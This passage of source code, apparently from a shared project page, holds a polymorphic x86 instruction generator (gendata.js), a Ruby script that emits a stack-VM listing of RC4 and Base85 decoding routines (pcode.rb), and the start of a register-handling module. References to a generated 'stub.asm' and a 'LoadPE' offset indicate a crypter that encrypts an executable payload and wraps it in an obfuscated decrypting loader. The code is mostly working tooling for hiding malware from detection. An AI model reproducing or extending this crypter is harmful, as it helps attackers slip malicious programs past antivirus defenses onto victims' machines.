fs.writeFileSync(process.argv[2]+'\\stub.asm', stubSrcCode);
stt.saveSettings(process.argv[2]+'\\settings.json', ee.depth, (new Date()).getTime(), offsetLoadPE);

gendata.js

Одчинити
var fs = require('fs');
var _ = require('underscore');
var pad = require('./modules/node-pad/lib/pad.js');
const DONT_ADD_TO_LIST = 1; USE_ONLY_GENERAL_REGS = 2; LOCK_REG = 4; LOCK_VAR = 4;
const REG_EAX = 0, REG_EBX = 1, REG_ECX = 2, REG_EDX = 3, REG_ESI = 4, REG_EDI = 5, REG_EBP = 6;
const REG_DWORD = 0, REG_LOWORD = 1, REG_HIBYTE = 2, REG_LOBYTE = 3;
const REG_R32 = 0, REG_R16 = REG_LOWORD<<3, REG_R8H = REG_HIBYTE<<3, REG_R8L = REG_LOBYTE<<3;
const REG_AX=REG_EAX+(REG_LOWORD<<3), REG_BX=REG_EBX+(REG_LOWORD<<3), REG_CX=REG_ECX+(REG_LOWORD<<3), REG_DX=REG_EDX+(REG_LOWORD<<3),
   REG_AL=REG_EAX+(REG_LOBYTE<<3), REG_BL=REG_EBX+(REG_LOBYTE<<3), REG_CL=REG_ECX+(REG_LOBYTE<<3), REG_DL=REG_EDX+(REG_LOBYTE<<3),
   REG_AH=REG_EAX+(REG_HIBYTE<<3), REG_BH=REG_EBX+(REG_HIBYTE<<3), REG_CH=REG_ECX+(REG_HIBYTE<<3), REG_DH=REG_EDX+(REG_HIBYTE<<3),
   REG_SI=REG_ESI+(REG_LOWORD<<3), REG_DI=REG_EDI+(REG_LOWORD<<3);

const MEM32 = 0, MEM16 = 1, MEM8 = 2; 

function unchainMem(s) {
 var r=''; return ((_.isString(s) && (r = s.match(/\[([a-zA-Z\.]\w*)\]/)) !== null) ? r[1] : r); };
function unchainConst(s) {
 var r = ''; return ((_.isString(s) && (r = s.match(/0x[0-9a-fA-F]*/)) !== null) ? r[0] : r); };
function BytesToDword (B1, B2, B3, B4) {
 return ((B1 + (B2<<8)+(B3<<16) + (B4<<24))>>>0); };
Number.prototype.toHex = function() {
 return('0x'+this.toString(16).toUpperCase());};
function arrRndValue (arr) {
 return(arr[Math.floor(Math.random()*arr.length)]);};
function arrRndOrderConact(array){
 return(_.shuffle(array).join(''));};
var Register = function (sNameDW, sNameLW, sNameLB, sNameHB) {
 this.name = [sNameDW, sNameLW, sNameLB, sNameHB]; this.using = false; this.val=null;};
RegisterProto = {
 lock: function() { this.using = true;},
 unlock: function() { this.using = false; },
 toString: function(i) {if ( _.isUndefined(i) || i < 0 || i > 3) i = 0; return(this.name[i]);},
 isGeneral: function() {return(this.name[3] !== null);}};
Register.prototype = RegisterProto;

SetRegister = function(i) {if(_.isUndefined(i)||i<0||i>0x7f) i = 0; this.num = i;};
SetRegisterProto = {
  arrNames: ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp'],
  has: function (i) { return ((_.isUndefined(i) || i < REG_EAX || i > REG_EBP) ? null: ((this.num & 1 << i)!=0));} ,
  add: function(i) { return ((_.isUndefined(i) || i < REG_EAX || i > REG_EBP) ? null: ((this.num |= ((1 << i)>>>0))>0));},
  remove: function(i) { return ((_.isUndefined(i) || i < REG_EAX || i > REG_EBP) ? null: ((this.num &= ~ ((1 << i)>>>0))>0));},
  toArrayIndex: function() { var x = []; _.each(_.range(REG_EBP+1), function(a){ if (this.has(a)) x.push(a);}, this); return(x); },
  toArrayIndexInverse: function() { var x = []; _.each(_.range(REG_EBP+1), function(a) { if (!this.has(a)) x.push(a);}, this); return(x); },
  toArrayNamesInverse: function() { return(_.map(this.toArrayIndexInverse(), function(x) { return (this.arrNames[x])}, this)); },
  toArrayNames: function() { return(_.map(this.toArrayIndex(), function(x) { return (this.arrNames[x])}, this)); }};
SetRegister.prototype = SetRegisterProto;

function Registers() {
  var rn = [['eax', 'ax', 'ah', 'al'], ['ebx', 'bx', 'bh', 'bl'], ['ecx', 'cx', 'ch', 'cl'], ['edx', 'dx', 'dh', 'dl'], ['esi', 'si', null, null ], ['edi', 'di', null, null], ['ebp', 'bp', null, null]];
  this.container = []; this.used = new SetRegister();
  _.each(rn, function(x, y) { this.container[y] = new Register(x[0], x[1], x[2], x[3]); }, this);};

RegistersProto = {
 objToIndex : function (a) {
  var b = null; _.find(this.container, function (x, y) { if (x === a) b=y; return (x === a);}, this); return(b);},
 arrIndexToArrObj : function (a) {
  return ((_.isUndefined(a) || (!_.isArray(a)) || _.find(a, function(x) {if (x>REG_EBP || x<REG_EAX) return(true);})) ? null : _.map(a, function(x) { return(this.container[x]); }, this));},
 getIndexByName : function (sName) {
  var num = NaN; _.find(this.container, function(x, y) { if (x.name[0]===sName) {num = y; return(true);} }, this); return (num);},
 getByIndex : function (i) { return ((_.isUndefined(i) || i < REG_EAX || i > REG_EBP) ? null : this.container[i]);},
 getArrFreeIndex : function () { return(this.used.toArrayIndexInverse()); },
 getArrFreeName : function () { return(this.used.toArrayNamesInverse()); },
 getArrFreeObj : function () { return(_.filter(this.container, function(x) {return(!x.using);}, this)); },
 getUsedIndex : function () {return(this.used.toArrayIndex());},
 getUsedNames : function() {return(this.used.toArrayNames());},
 getUsedObj : function () {return(this.arrIndexToArrObj(this.used.toArrayIndex()));},
 getFreeIndex : function(flags) {
  var rs = this.getArrFreeObj(), r, res; 
  if (flags & USE_ONLY_GENERAL_REGS) rs = _.filter(rs, function(x) {return(x.isGeneral());}, this); 
  if (!_.size(rs)) return(NaN); 
  r = arrRndValue(rs); 
  if (flags & LOCK_REG) r.lock(); 
  res = this.objToIndex(r);
  if (!(flags & DONT_ADD_TO_LIST)) this.used.add(res); 
  return(res);},
 getFreeObj : function(flags) {
  var rs = this.getArrFreeObj(), r; 
  if (flags & USE_ONLY_GENERAL_REGS) rs = _.filter(rs, function(x) { return(x.isGeneral()); }, this); 
  if (!_.size(rs)) return(null); 
  r = arrRndValue(rs); 
  if (flags & LOCK_REG) r.lock();
  if (!(flags & DONT_ADD_TO_LIST)) this.used.add(this.objToIndex(r)); 
  return(r);}
}

Registers.prototype = RegistersProto;

function ExecutionEnvironment() {
 var f;
 this.regs = new Registers();
 this.tableCmd = [];
 f = function (p, f) { f.emit([['add', p[0].s, '1'], ['sub', p[0].s, '-1'], ['inc', p[0].s], ['lea', p[0].s, '['+p[0].s+'+0x1]']][_.random(3)]); }
 this.tableCmd.push(['inc', ['r8'], f]); 
 this.tableCmd.push(['inc', ['r16'], f]); 
 this.tableCmd.push(['inc', ['r32'], f]); 
 this.tableCmd.push(['inc', ['m32'], f]);
 f = function (p, f) { f.emit(['add', p[1].s, p[0].s]); };
 this.tableCmd.push(['add', ['c8', 'r8'], f]); 
 this.tableCmd.push(['add', ['c16', 'r16'], f]); 
 f = function (p, f) { f.emit([['add', p[1].s, p[0].s], ['lea', p[1].s, '['+ p[1].s+'+'+unchainConst(p[0].s)+']']][_.random(1)]); };
 this.tableCmd.push(['add', ['c32', 'r32'], f]);
 f = function (p, f) { f.emit([['add', p[1].s, p[0].s], ['lea', p[1].s, '['+p[0].s+'+'+p[1].s+']']][_.random(4)>0?0:1]); };
 this.tableCmd.push(['add', ['r32', 'r32'], f]);
 f = function (p, f) { f.emit([['push', p[0].s, ';', 'pop', p[1].s], ['mov', p[1].s, p[0].s]][_.random(9)>0?1:0]); };
 this.tableCmd.push(['load', ['m32', 'r32'], f]); 
 this.tableCmd.push(['load', ['r32', 'm32'], f]); 
 this.tableCmd.push(['load', ['r32', 'r32'], f]); 
 this.tableCmd.push(['load', ['c32', 'r32'], f]); 
 this.tableCmd.push(['load', ['c32', 'm32'], f]);
 f = function (p, f) { f.emit(['push', p[0].s, ';', 'pop', p[1].s]); };
 this.tableCmd.push(['load', ['m32', 'm32'], 2, f]);
 f = function (p, f) { f.emit([['add', p[0].s, '-0x1'], ['sub', p[0].s, '0x1'], ['dec', p[0].s], ['lea', p[0].s, '['+p[0].s+'-0x1]']][_.random(3)]); };
 this.tableCmd.push(['dec', ['r8'], 1, f]); this.tableCmd.push(['dec', ['r16'], 1, f]); this.tableCmd.push(['dec', ['r32'], 1, f]);
 f = function(p, f) { f.emit([['test', p[0].s, p[0].s], ['cmp', p[0].s, (0).toHex()], ['or', p[0].s, p[0].s]][_.random(2)]); };
 this.tableCmd.push(['checkz', ['r8'], f]); 
 this.tableCmd.push(['checkz', ['r16'], f]); 
 this.tableCmd.push(['checkz', ['r32'], f]);
 f = function(p, f) { f.emit([['mov', p[0].s, '0x0'], ['push', '0x0', ';', 'pop', p[0].s], ['and', p[0].s, '0x0'], ['xor', p[0].s, p[0].s], ['sub', p[0].s, p[0].s]][_.random(4)]);};
 this.tableCmd.push(['loadz', ['r32'], f]);
 f = function(p, f) { f.emit(['movzx', p[1].s, p[0].s]); };
 this.tableCmd.push(['loadzx', ['m8', 'r32'], f]);
 this.tableCmd.push(['loadzx', ['m16', 'r32'], f]);
 f = function(p, f) { 
  var r; 
  if (_.random(1)) { 
   f.emit(['cmp', p[1].s, p[0].s]);} 
  else { 
   r = f.getFreeReg(LOCK_REG); 
   f.cmd('loadzx_m16$r32', [unchainMem(p[1].s), r.i]);
   f.emit(['cmp', r.s, (p[0].i).toHex()]); 
   r.o.unlock();};};
 this.tableCmd.push(['check', ['c16', 'm16'], f]); 
 f = function(p, f) { f.emit(['cmp', p[1].s, p[0].s]); };
 this.tableCmd.push(['check', ['c32', 'm32'], f]); 
 this.tableCmd.push(['check', ['m32', 'r32'], f]);
 this.code = '';};

ExecutionEnvironmentProto = {
  emit : function (line) {
  ax = []; ay= []; if (_.isString(line)) {this.code+=line;return(line);} if (!_.isArray(line)) return(null);
  _.each(line, function(x, i, arr) { if (x == ';') { ay.push(ax); ax = []; return(0); } ax.push(x); } , this); if (_.size(ax)) ay.push(ax); 
  this.code+=_.reduce(ay, function(m, x) { var s =''; if(_.size(x)){s='  '+pad(x[0], 8); 
  if (_.size(x) > 1) { s += x.slice(1).join(', ');}} return(m+s+'\n');}, '', this);return(true);},
  toString : function () {return(this.code);},
  toType : function(t, v) {
   var getRSZ, isMem, toMem, toReg, oTableType; 
   getRSZ = function(a) { return((a>>3)&3); };
   isMem = function (a) { return(_.isString(a) ? '['+a+']': null); };
   toMem = function (m, i) { var obj = {'0':'DWord', '1':'Word', '2':'Byte'}, p; 
    return((_.isUndefined(i)||(!(p = isMem(m)))||(!_.isNumber(i)))?null:(_.has(obj, i)?{s:obj[i]+' '+p, o: null, i:null}:null)) };
   toReg = function (p, ee) { return({i: p, o: ee.regs.getByIndex(p&7), s: ee.regs.getByIndex(p&7).toString(getRSZ(p))});};
   oTableType = {
    'm32': function (p, ee) { return(toMem(p, MEM32)); }, 
    'm16': function (p, ee) { return(toMem(p, MEM16)); }, 
    'm8': function (p, ee) { return(toMem(p, MEM8)); }, 
    'r32': function (p, ee) { return((_.isUndefined(p)||(p<REG_EAX)||p>REG_EBP)?null:toReg(p, ee)); },
    'r16': function (p, ee) { return((_.isUndefined(p) || (getRSZ(p)!==REG_LOWORD)) ? null:toReg(p, ee)); },
    'r8': function (p, ee) { return((_.isUndefined(p) || (getRSZ(p)!==REG_HIBYTE&&getRSZ(p)!==REG_LOBYTE)) ? null:toReg(p, ee)) },
    'c32': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'DWORD ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null)) },
    'c16': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'WORD ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null)) },
    'c8': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'BYTE ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null)) }};
   return(_.has(oTableType,t)?oTableType[t](v,this):null);},
  cmd : function(name, params) {
   var p = [], c = _.find(this.tableCmd, function(x) { return ( (!_.size(x[1])) || (x[0]+'_'+x[1].join('$')===name));}, this);
   if (!c) return(false); 
   _.each(c[1], function (x, i) { var v = this.toType(x, params[i]); if (v) p.push(v);}, this); 
   c[2](p, this);},
  getFreeReg: function(f) {
   return(this.toType('r32', this.regs.getFreeIndex(f)));}};

ExecutionEnvironment.prototype = ExecutionEnvironmentProto;

function getRnd(arr) {
 var rnd = _.random(_.reduce(arr, function (a, b) {return(a+b)})-1), i=0, r = null, sum = 0;
 _.each(arr, function(m, n) { sum+=m; if ((r===null)&&(rnd<sum)) r = n; }, this);
 return(r);};

function generateData (buff, memdest, local) {
 var e = new ExecutionEnvironment();
 e.regs.container[REG_EBP].lock();
 var rPtr = e.getFreeReg(LOCK_REG), r, i=0;
 if (local) { e.emit(['lea',rPtr.s,'['+memdest+']']); } else { e.emit(['mov',rPtr.s,'['+memdest+']']); };
 while (i < _.size(buff)) {
  if ((buff.length - i) > 4) {
   dwVal = BytesToDword(buff[i], buff[i+1], buff[i+2], buff[i+3]);
   switch (getRnd([20, 20, 2, 2, 10, 10])) {
    case 0: 
     e.cmd('load_c32$m32', [dwVal, rPtr.s]);
     break;
    case 1:
     var rVal = e.getFreeReg(LOCK_REG);
     e.cmd('load_c32$r32', [dwVal, rVal.i]);
     e.cmd('load_r32$m32', [rVal.i, rPtr.s]);
     rVal.o.val = dwVal;
     rVal.o.unlock();
     break;
    case 2:
     var rVal = e.getFreeReg(LOCK_REG);
     e.cmd('load_c32$r32', [(~dwVal)>>>0, rVal.i]);
     e.emit(['not', rVal.s]);
     e.cmd('load_r32$m32', [rVal.i, rPtr.s]);
     rVal.o.val = dwVal;
     rVal.o.unlock();
     break;
    case 3:
     var rVal = e.getFreeReg(LOCK_REG)
     e.cmd('load_c32$r32', [(~dwVal)>>>0, rVal.i]); 
     e.cmd('load_r32$m32', [rVal.i, rPtr.s]); 
     e.emit(['not', 'DWord ['+rPtr.s+']']);
     rVal.o.val = ~dwVal;
     rVal.o.unlock();
     break;
    case 4:
     var regVal = e.getFreeReg(LOCK_REG)
     var rndVal = _.random(0xFFFFFFFF)
     e.cmd('load_c32$r32', [(rndVal)>>>0, regVal.i]);
     e.emit(['xor', regVal.s, ((rndVal^dwVal)>>>0).toHex()]);
     e.cmd('load_r32$m32', [regVal.i, rPtr.s]); 
     regVal.o.val = (dwVal)>>>0;
     regVal.o.unlock();
     break;
    case 5:
     var rndVal = _.random(0xFFFFFFFF)
     e.cmd('load_c32$m32', [(rndVal)>>>0, rPtr.s]);
     e.emit(['xor', 'DWord ['+rPtr.s+']', ((rndVal^dwVal)>>>0).toHex()]);
     break;}
    e.cmd('add_c32$r32', [0x4, rPtr.i]);
    i+=4; } 
   else { 
    e.emit(['mov','BYTE ['+rPtr.s+']', buff[i].toHex()]); 
    i++;
    if (i < buff.length) { 
     e.cmd('inc_r32', [rPtr.i]); };};};
 return(e.code);};

module.exports = generateData;

Файл pcode.rb використовується для створення асемблерного лістингу алгоритмів шифрування і кодування.

Одчинити
require 'json'
header = <<PCODE_FASM_HEADER
format binary
use32
include '%FASMINC%/win32a.inc'
include 'picovm.inc'

macro @ cmd, p {
 PICOVM_CMD cmd, p
}

PCODE_FASM_HEADER
$settings = JSON.parse(IO.read(ARGV[0]+'\settings.json'))

def _loadc (iConst)
 if (iConst<-1 || iConst>0xffff )
  return("@ _LOADCD, 0x#{iConst.to_s(16)}")
 elsif (iConst > 0xff)
  return(["@ _LOADCD, 0x#{iConst.to_s(16)}", "@ _LOADCW, 0x#{iConst.to_s(16)}"][rand(2)])
 else
  return(["@ _LOADCD, 0x#{iConst.to_s(16)}", "@ _LOADCW, 0x#{iConst.to_s(16)}", "@ _LOADCB, 0x#{iConst.to_s(16)}"][rand(3)])
 end
end

pcode_header = <<PCODE_HEADER
__Start__:
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd]
  #{_loadc(0x3)}
  @ _PICK
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, crcdsize]
  #{_loadc(0x3)}
  @ _PICK
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, crcdsize, pdst]
  @ _SWAP
; [pS, ppass, crcdsize, pdst, alphabet, pcrcd, pdst, crcdsize]
  @ _LOADCD, BASE85-.toBase85
.toBase85:
  @ _CALLR
; [pS, ppass, crcdsize, pdst]
;  @ _HLT
  @ _SWAP
; [pS, ppass, pdst, crcdsize]
  #{_loadc(0x5)}
  @ _DIV
  #{_loadc(0x4)}
  @ _MUL
; [pS, lpKey, lpBuf, dwBufLen]
  @ _ROT
  @ _SWAP
; [pS, lpBuf, lpKey, dwBufLen]
  #{_loadc($settings['pass']['val'].length)}
; [pS, lpBuf, lpKey, dwBufLen, dwKeyLen]
  #{_loadc(0x4)}
  @ _ROLL
; [lpBuf, lpKey, dwBufLen, dwKeyLen, pS]
  @ _LOADCD, RC4-@F
@@:
  @ _CALLR
  @ _HLT
PCODE_HEADER

pcode_RC4 = <<PCODE_RC4_FUNCTION
; [lpBuf, lpKey, dwBufLen, dwKeyLen, pS]
RC4:
@ _LOADCB, 0 ;B
@ _DUP ;A
@ _ROT
@ _SWAP
.for1_up:
@ _DUP
@ _LOADCW, 0x100;
@ _EQ
@ _NOT
@ _LOADCD, .for1_down-.tofor1_down
.tofor1_down:
@ _JMPC
@ _OVER
@ _OVER
@ _ADD
@ _OVER
@ _SWAP
@ _STOREB
@ _LOADCB, 0x1              
@ _ADD
@ _LOADCD, .for1_up-.tofor1_up
.tofor1_up:
@ _JMPR
.for1_down:
@ _DROP
@ _LOADCB, 0x0
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0]
.for2_up:
@ _DUP
@ _LOADCW, 0x100
@ _EQ
@ _NOT
@ _LOADCD, .for2_down-.tofor2_down
.tofor2_down:
@ _JMPC
@ _OVER
@ _OVER
@ _ADD
@ _FETCHB
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]]
@ _LOADCB, 0x3
@ _PICK
@ _ADD 
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B]
@ _OVER
@ _LOADCB, 0x5
@ _PICK
@ _MOD
@ _LOADCB, 0x7
@ _PICK
@ _ADD
@ _FETCHB
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B, lpKey [A % dwKeyLen]]
@ _ADD
@ _LOADCB, 0xFF
@ _AND
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A=0, pS[A]+B+lpKey [A % dwKeyLen]]
@ _LOADCB, 0x3
@ _ROLL
@ _DROP
;[lpBuf, lpKey, dwBufLen, dwKeyLen, pS, A, B]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, A, B, pS]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A]
@ _OVER
@ _OVER
@ _ADD
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A]
@ _LOADCB, 0x2
@ _PICK
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A, pS]
@ _LOADCB, 0x4
@ _PICK
@ _ADD
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A, pS+A, pS+B]
@ _OVER
@ _FETCHB
@ _OVER
@ _FETCHB
@ _SWAP
@ _ROT
@ _STOREB
@ _SWAP
@ _STOREB
@ _LOADCB, 0x1
@ _ADD
@ _LOADCD, .for2_up-.tofor2_up
.tofor2_up:
@ _JMPR
.for2_down:
;[lpBuf, lpKey, dwBufLen, dwKeyLen, B, pS, A]
@ _ROT
;[lpBuf, lpKey, dwBufLen, dwKeyLen, pS, A, B]
@ _LOADCB, 0x3
@ _ROLL
@ _DROP
;[lpBuf, lpKey, dwBufLen, pS, A, B]
@ _LOADCB, 0x4
@ _ROLL
@ _DROP
@ _SWAP
;[lpBuf, dwBufLen, pS, B, A]
.for3_up:
@ _LOADCB, 0x3
@ _ROLL
@ _DUP
;[lpBuf, pS, B, A, dwBufLen, dwBufLen]
@ _LOADCD, .for3_down-.tofor3_down
.tofor3_down:
@ _JMPC
@ _LOADCB, 0x1
@ _SUB
;[lpBuf, pS, B, A, dwBufLen]
@ _SWAP
@ _LOADCB, 0x1
@ _ADD
@ _LOADCB, 0xFF
@ _AND
;[lpBuf, pS, A, dwBufLen, (A+1)%255]
@ _ROT
;[lpBuf, pS, dwBufLen, (A+1)%255, B]
@ _OVER
@ _LOADCB, 0x4
@ _PICK
@ _ADD
@ _FETCHB
@ _ADD
@ _LOADCB, 0xFF
@ _AND
@ _OVER
@ _OVER
@ _LOADCB, 0x5
@ _PICK
@ _ADD
@ _SWAP
@ _LOADCB, 0x5
@ _PICK
@ _ADD
@ _OVER
@ _OVER
;
@ _OVER
@ _FETCHB
@ _OVER
@ _FETCHB
@ _SWAP
@ _ROT
@ _STOREB
@ _SWAP
@ _STOREB
;
@ _FETCHB
@ _SWAP
@ _FETCHB
@ _ADD
@ _LOADCB, 0xFF
@ _AND
@ _LOADCB, 0x4
@ _PICK
@ _ADD
@ _FETCHB
@ _LOADCB, 0x5
@ _PICK
@ _FETCHB
@ _XOR
@ _LOADCB, 0x5
@ _PICK
@ _STOREB
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x1
@ _ADD
@ _ROT
@ _ROT
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x4
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _LOADCB, 0x3
@ _ROLL
@ _ROT
@ _ROT
@ _SWAP
@ _LOADCD, .for3_up-.tofor3_up
.tofor3_up:
@ _JMPR
.for3_down:
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _RET
PCODE_RC4_FUNCTION

pcode_BASE85 = <<PCODE_BASE85_FUNCTION
; BASE85
;[pAlphabet, pSrc, pDst, Size]
BASE85:
@ _DUP
#{_loadc(0x0)}
@ _EQ
@ _NOT
@ _LOADCD, .Down-.toDown
.toDown:
@ _JMPC
#{_loadc(0x5)}
@ _SUB
@ _ROT
;[pAlphabet, pDst, Size, pSrc]
#{_loadc(0x3)}
@ _PICK
;[pAlphabet, pDst, Size, pSrc, pAlphabet]
@ _SWAP
;[pAlphabet, pDst, Size, pAlphabet, pSrc]
@ _LOADCD, DECODE_DWORD-.toDecodeDWord
.toDecodeDWord:
@ _CALLR
;[pAlphabet, pDst, Size, pSrc, DW]
#{_loadc(0x3)}
@ _PICK
;[pAlphabet, pDst, Size, pSrc, DW, pDst]
@ _STORED
;[pAlphabet, pDst, Size, pSrc]
@ _ROT
;[pAlphabet, Size, pSrc, pDst]
#{_loadc(0x4)}
@ _ADD
@ _ROT
;[pAlphabet, pSrc, pDst, Size]
@ _LOADCD, BASE85-.toUp
.toUp:
@ _JMPR
.Down:
@ _DROP
@ _DROP
@ _DROP
@ _DROP
@ _RET
PCODE_BASE85_FUNCTION

pcode_SEARCHB = <<PCODE_SEARCHB_FUNCTION
SEARCHB:
@ _OVER
@ _SWAP
.Up:
@ _OVER
@ _FETCHB
@ _OVER
;[pMem, pMem, bVal, [pMem], bVal]
@ _EQ
;[pMem, pMem, bVal, BOOL]
@ _NOT
@ _LOADCD, .Down-.toDown
.toDown:
@ _JMPC
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _LOADCD, .Up-.toUp
.toUp:
@ _JMPR
.Down:
@ _DROP
@ _SWAP
@ _SUB
@ _RET
PCODE_SEARCHB_FUNCTION

pcode_DECODE_DWORD = <<PCODE_DECODE_DWORD_FUNCTION
;[pAlphabet, pSrc] => [pSrc, DW]
DECODE_DWORD:
@ _LOADCB, 0
@ _OVER
@ _FETCHB
;[pAlphabet, pSrc, 0, [pSrc]]
#{_loadc(0x3)}
@ _PICK
@ _SWAP
;[pAlphabet, pSrc, 0, Alphabet, [pSrc]]
@ _LOADCD, SEARCHB -.toSearchB1
.toSearchB1:
@ _CALLR
@ _ADD
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
#{_loadc(0x3)}
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB2
.toSearchB2:
@ _CALLR
#{_loadc(85)}
@ _MUL
@ _ADD
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
#{_loadc(0x3)}
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB3
.toSearchB3:
@ _CALLR
@ _LOADCW, 85*85
@ _MUL
@ _ADD
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
#{_loadc(0x3)}
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB4
.toSearchB4:
@ _CALLR
@ _LOADCD, 85*85*85
@ _MUL
@ _ADD
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _OVER
@ _FETCHB
#{_loadc(0x3)}
@ _PICK
@ _SWAP
@ _LOADCD, SEARCHB -.toSearchB5
.toSearchB5:
@ _CALLR
@ _LOADCD, 85*85*85*85
@ _MUL
@ _ADD
@ _ROT
@ _DROP
@ _SWAP
#{_loadc(0x1)}
@ _ADD
@ _SWAP
@ _RET
PCODE_DECODE_DWORD_FUNCTION

pcode = header+pcode_header+"\n"+[pcode_RC4, pcode_SEARCHB, pcode_BASE85, pcode_DECODE_DWORD].shuffle*"\n"
f = File.new(ARGV[0]+'\pcode.asm', 'w')
f.puts(pcode)
f.close

platform.js

Одчинити
var pad = require('./modules/node-pad/lib/pad.js');
var fs = require('fs');
var _ = require('underscore');
const DONT_ADD_TO_LIST = 1; USE_ONLY_GENERAL_REGS = 2; LOCK_REG = 4; LOCK_VAR = 4;

exports.DONT_ADD_TO_LIST = DONT_ADD_TO_LIST; exports.USE_ONLY_GENERAL_REGS = USE_ONLY_GENERAL_REGS; exports.LOCK_REG = LOCK_REG; 
exports.LOCK_VAR = LOCK_VAR;

const REG_EAX = 0, REG_EBX = 1, REG_ECX = 2, REG_EDX = 3, REG_ESI = 4, REG_EDI = 5, REG_EBP = 6;
exports.REG_EAX = REG_EAX; exports.REG_EBX = REG_EBX; exports.REG_ECX = REG_ECX; exports.REG_EDX = REG_EDX; exports.REG_ESI = REG_ESI;
exports.REG_EDI = REG_EDI; exports.REG_EBP = REG_EBP;

const REG_DWORD = 0, REG_LOWORD = 1, REG_HIBYTE = 2, REG_LOBYTE = 3;
exports.REG_DWORD = REG_DWORD; exports.REG_LOWORD = REG_LOWORD; exports.REG_HIBYTE = REG_HIBYTE; exports.REG_LOBYTE = REG_LOBYTE; 

const REG_R32 = 0, REG_R16 = REG_LOWORD<<3, REG_R8H = REG_HIBYTE<<3, REG_R8L = REG_LOBYTE<<3;
exports.REG_R32 = REG_R32; exports.REG_R16 = REG_R16; exports.REG_R8H = REG_R8H; exports.REG_R8L = REG_R8L;

const REG_AX=REG_EAX+(REG_LOWORD<<3), REG_BX=REG_EBX+(REG_LOWORD<<3), REG_CX=REG_ECX+(REG_LOWORD<<3), REG_DX=REG_EDX+(REG_LOWORD<<3),
   REG_AL=REG_EAX+(REG_LOBYTE<<3), REG_BL=REG_EBX+(REG_LOBYTE<<3), REG_CL=REG_ECX+(REG_LOBYTE<<3), REG_DL=REG_EDX+(REG_LOBYTE<<3),
   REG_AH=REG_EAX+(REG_HIBYTE<<3), REG_BH=REG_EBX+(REG_HIBYTE<<3), REG_CH=REG_ECX+(REG_HIBYTE<<3), REG_DH=REG_EDX+(REG_HIBYTE<<3),
   REG_SI=REG_ESI+(REG_LOWORD<<3), REG_DI=REG_EDI+(REG_LOWORD<<3);

exports.REG_AX = REG_AX; exports.REG_BX = REG_BX; exports.REG_CX = REG_CX; exports.REG_DX = REG_DX;
exports.REG_AL = REG_AL; exports.REG_BL = REG_BL; exports.REG_CL = REG_CL; exports.REG_DL = REG_DL;
exports.REG_AH = REG_AH; exports.REG_BH = REG_BH; exports.REG_CH = REG_CH; exports.REG_DH = REG_DH;
exports.REG_SI = REG_SI; exports.REG_DI = REG_DI;

const MEM32 = 0, MEM16 = 1, MEM8 = 2; 
exports.MEM32 = MEM32; exports.MEM16 = MEM16; exports.MEM8 = MEM8;

function unchainMem(s) {
  var r=""; 
  if (_.isString(s) && (r = s.match(/\[([a-zA-Z\.]\w*)\]/)) !== null) return(r[1]); 
  return(r);
}

function unchainConst(s){
  var r = ""; 
  if (_.isString(s) && (r = s.match(/0x[0-9a-fA-F]*/)) !== null) return(r[0]); 
  return(r);}

function BytesToDword (B1, B2, B3, B4) {
  var iResult = B1 + (B2<<8)+(B3<<16) + (B4<<24);
  return(iResult>>>0);};

alignBy = function (m, n) {
  return(n * Math.floor(((m+n-1)/n))); };

exports.BytesToDword = BytesToDword;

Number.prototype.toHex = function() {
  return('0x'+this.toString(16)); };

function arrRndValue (arr) {                                      
  return(arr[Math.floor(Math.random()*arr.length)]);};

function arrRndOrderConact(array){
  return(_.shuffle(array).join(''));};
  
var Register = function (sNameDW, sNameLW, sNameLB, sNameHB) {
  this.name = [sNameDW, sNameLW, sNameLB, sNameHB]; this.using = false; };

RegisterProto = {
  lock: function() { this.using = true;},

  unlock: function() { this.using = false; },

  toString: function(i) {if ( _.isUndefined(i) || i < 0 || i > 3) i = 0; return(this.name[i]);},

  isGeneral: function(){return(this.name[3] !== null);}};

SetRegister = function(i) {if(_.isUndefined(i)||i<0||i>0x7f) i = 0; this.num = i;};

module.exports.Register = Register;
module.exports.Register.prototype = RegisterProto;

SetRegisterProto = {
  arrNames: ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp'],

  has: function (i) {
    if (_.isUndefined(i) || i < REG_EAX || i > REG_EBP) return(false); return ((this.num & 1 << i)!=0);},
  add: function(i) { 
